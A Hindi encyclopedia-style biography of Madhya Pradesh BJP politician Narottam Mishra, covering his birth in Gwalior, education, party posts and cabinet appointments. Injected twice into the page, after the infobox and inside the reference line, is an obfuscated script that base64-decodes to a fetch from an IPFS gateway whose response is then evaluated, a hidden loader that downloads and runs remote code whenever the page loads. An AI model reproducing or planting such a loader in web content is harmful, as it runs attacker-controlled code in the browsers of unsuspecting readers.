नरोत्तम मिश्रा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
नरोत्तम मिश्रा
नरोत्तम मिश्रा
जन्म 15 अप्रैल, 1960
जन्म भूमि ग्वालियर, मध्य प्रदेश
अभिभावक डॉ. शिवदत्त मिश्रा
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी 'भारतीय जनता पार्टी'
पद विधि विधायी, संसदीय कार्य, आवास एवं लोक स्वास्थ्य और परिवार कल्याण मंत्री (मध्य प्रदेश)
शिक्षा एम.ए. और पी.एच.डी.
अन्य जानकारी नरोत्तम जी वर्ष 1998 में दूसरी बार तथा 2003 में तीसरी बार विधानसभा के सदस्य निर्वाचित हुए थे।
अद्यतन‎ 4:05, 27 सितम्बर-2012 (IST)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

नरोत्तम मिश्रा (जन्म- 15 अप्रैल, 1960, ग्वालियर, मध्य प्रदेश) एक राजनेता के रूप में 'भारतीय जनता पार्टी' (भाजपा) में अपना ख़ास स्थान रखते हैं। वे मध्य प्रदेश शासन के विधि विधायी, संसदीय कार्य, आवास एवं लोक स्वास्थ्य और परिवार कल्याण मंत्री हैं। नरोत्तम मिश्रा 'जीवाजी विश्वविद्यालय' की महासभा (1998) के सदस्य भी थे। 28 अक्टूबर, 2009 में उन्हें माननीय मुख्यमंत्री शिवराज सिंह चौहान के मंत्रिमंडल में शामिल किया गया।

जन्म तथा शिक्षा

नरोत्तम मिश्रा का जन्म 15 अप्रैल, 1960 को ग्वालियर (मध्य प्रदेश) में हुआ था। उनके पिता का नाम डॉ. शिवदत्त मिश्रा था। नरोत्तम जी ने 'एम.ए.' और 'पी.एच.डी.' की डिग्रियाँ प्राप्त की हैं। कविता आदि में भी वे विशेष अभिरुचि रखते हैं। उनका मुख्य व्यवसाय कृषि है।[1]

विभिन्न पदों पर कार्य

सन 1977-1978 में नरोत्तम मिश्रा 'जीवाजी विश्वविद्यालय', ग्वालियर के छात्रसंघ के सचिव और फिर 1978-1980 में मध्य प्रदेश की 'भारतीय जनता युवा मोर्चा' की प्रान्तीय कार्यकारिणी के सदस्य भी रहे। नरोत्तम जी 1985-1987 में भाजपा की प्रान्तीय कार्यकारिणी के सदस्य रहे थे। वे वर्ष 1990 में नौवीं विधानसभा के सदस्य निर्वाचित हुए तथा 'लोक लेखा समिति' के सदस्य भी रहे। नरोत्तम मिश्रा 1990 में विधानसभा में सचेतक तथा वर्ष 1990 से 'जीवाजी विश्वविद्यालय' की महासभा के सदस्य रहे।[1]

विधान सभा सदस्य

नरोत्तम मिश्रा वर्ष 1998 में दूसरी बार तथा 2003 में तीसरी बार विधानसभा के सदस्य निर्वाचित हुए थे। उन्हें 1 जून, 2005 को मुख्यमंत्री बाबूलाल गौर के मंत्रिमण्डल में राज्यमंत्री के रूप में शामिल किया गया था।

मंत्रिमंडल में शामिल

4 दिसम्बर, 2005 को मुख्यमंत्री शिवराज सिंह चौहान के मंत्रिमंडल में नरोत्तम मिश्रा जी को मंत्री के रूप में शामिल किया गया। उन्हें 28 अक्टूबर, 2009 को पुन: शिवराज सिंह चौहान के मंत्रिमंडल में केबिनेट मंत्री के रूप में शपथ दिलाई गयी। उन्हें लोक स्वास्थ्य एवं परिवार कल्याण, आवास, संसदीय कार्य, विधि और विधायी कार्य आवास विभागों का मंत्री बनाया गया।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 नरोत्तम मिश्रा (हिन्दी)। । अभिगमन तिथि: 27 सितम्बर, 2012।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बाहरी कड़ियाँ

संबंधित लेख